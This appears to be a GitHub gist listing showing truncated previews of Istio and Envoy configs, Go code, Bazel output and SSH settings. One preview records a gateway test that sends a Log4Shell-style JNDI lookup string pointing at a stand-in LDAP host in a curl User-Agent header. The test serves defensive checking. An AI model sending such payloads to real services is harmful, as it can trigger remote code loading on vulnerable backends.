package main
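// eventType enumerates the kinds of event declared in the const block below.
type eventType int

// Event kinds. The values come from iota so that each constant is distinct.
// With a literal 0 on the first line, Go's implicit repetition of the previous
// expression would give removeWord the value 0 as well, making the two kinds
// indistinguishable in any comparison or switch.
const (
	addWord eventType = iota
	removeWord
)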
type event struct {
incfly / authn-authz.yaml
Created May 27, 2022 18:56
conditional-authservice
apiVersion: security.istio.io/v1beta1
kind: RequestAuthentication
metadata:
name: httpbin
namespace: foo
spec:
selector:
matchLabels:
app: httpbin
jwtRules:
incfly / authz.yaml
Created April 29, 2022 18:51
istio-rbac-customize-error-message
# Istio "allow-nothing" policy for the `default` namespace.
# No `action` is given, so the policy uses the default ALLOW action; the spec
# holds no rules, so no request can match it. With no selector it applies to
# every workload in the namespace, so every request is denied unless another
# ALLOW policy matches it.
# NOTE(review): indentation was lost in this preview; `name`/`namespace` belong
# under `metadata:` and `{}` is the value of `spec:`.
apiVersion: security.istio.io/v1beta1
kind: AuthorizationPolicy
metadata:
name: allow-nothing
namespace: default
spec:
{}
incfly / app.go
Last active April 28, 2022 20:24
envoy-local-reply-not-working
// +build ignore
package main
import (
"flag"
"fmt"
"net"
"net/http"
"strconv"
$ bazel cquery --define boringssl=fips "//source/extensions/transport_sockets/tls/cert_validator:cert_validator_lib" --output=build
Starting local Bazel server and connecting to it...
INFO: Invocation ID: f7ce5045-4ac3-4146-9a65-7434359a79b1
INFO: SHA256 (https://golang.org/dl/?mode=json&include=all) = 8894bb6908be51c3ad0177954dbd7c3355de9c6a5960b2cb550c8b68ca953b79
INFO: Analyzed target //source/extensions/transport_sockets/tls/cert_validator:cert_validator_lib (247 packages loaded, 17216 targets configured).
INFO: Found 1 target...
# /home/fly/workspace/github.com/envoyproxy/envoy/source/extensions/transport_sockets/tls/cert_validator/BUILD:11:17
cc_library(
name = "cert_validator_lib",
visibility = ["//visibility:public"],
incfly / httpbin-ingress.yaml
Last active March 8, 2022 13:40
httpbin-tls-cert-extra-bytes.
apiVersion: v1
kind: ServiceAccount
metadata:
name: httpbin
---
apiVersion: v1
kind: Secret
metadata:
name: httpbin-credential
namespace: istio-system
# 2022-01-06T09:32:48.168864Z info status jianfeih debug, config:
# fqn gateway.xcp.tetrate.io/v2/IngressGateway:xcp-edge/test-ingress-gateway,
# status {gateway.xcp.tetrate.io/v2/IngressGateway:xcp-edge/test-ingress-gateway READY
# [name:"test-ingress-gateway" namespace:"echo-7-93217" result:READY
# name:"test-ingress-gateway-httpbin-mesh-internal" namespace:"echo-7-93217" result:READY
# name:"test-ingress-gateway-mesh-external" namespace:"echo-7-93217" result:READY
# name:"vs-app2-tetrate-io" namespace:"echo-7-93217" result:READY ] {} [] 0}
# Applying this in xcp-edge works, but applying it in xcp-system does not (it is not propagated to the xcp-edge namespace).
# Transcript of a gateway check: the User-Agent value is a JNDI-lookup-style
# string of the kind that log4j-based backends must not evaluate. The reply
# headers that follow come from envoy and include an upstream service time, so
# the request appears to have been forwarded to the backend; presumably nothing
# at this gateway filters or rewrites the header (confirm against the gateway
# config). Protection therefore has to come from patched backends or an explicit
# header filter, not from the proxy's defaults.
# NOTE(review): the quotes and the dash before "resolve" are typographic
# characters from a rich-text paste, so this is a record of what was run rather
# than a copy-pasteable command.
curl -H “Host: httpbin.tetrate.com” -H “User-Agent: ${JNDI://ldap://evial.xx/path}” \
–resolve “httpbin.tetrate.com:${GATEWAY_IP}” httpbin.tetrate.com/headers
< HTTP/1.1 200 OK
< server: envoy
< date: Tue, 28 Dec 2021 05:48:57 GMT
< content-type: application/json
< content-length: 28
< access-control-allow-origin: *
< access-control-allow-credentials: true
< x-envoy-upstream-service-time: 25
# Windows config.
Host <inst-name>
HostName <ip>
User fly
IdentityFile C:\Users\hujia\.ssh\google_compute_engine
# On Windows, the Clash proxy listens on localhost; use ncat (shipped with Nmap) to tunnel SSH through it. https://nmap.org/download.html
ProxyCommand C:\workspace\programs\Nmap\ncat.exe --proxy-type socks5 --proxy 127.0.0.1:7890 %h %p
# Linux config.
Host loomer-jp
HostName 34.84.98.136
apiVersion: networking.istio.io/v1alpha3
kind: EnvoyFilter
metadata:
name: lua
spec:
workloadSelector:
labels:
app: httpbin
configPatches:
- applyTo: HTTP_FILTER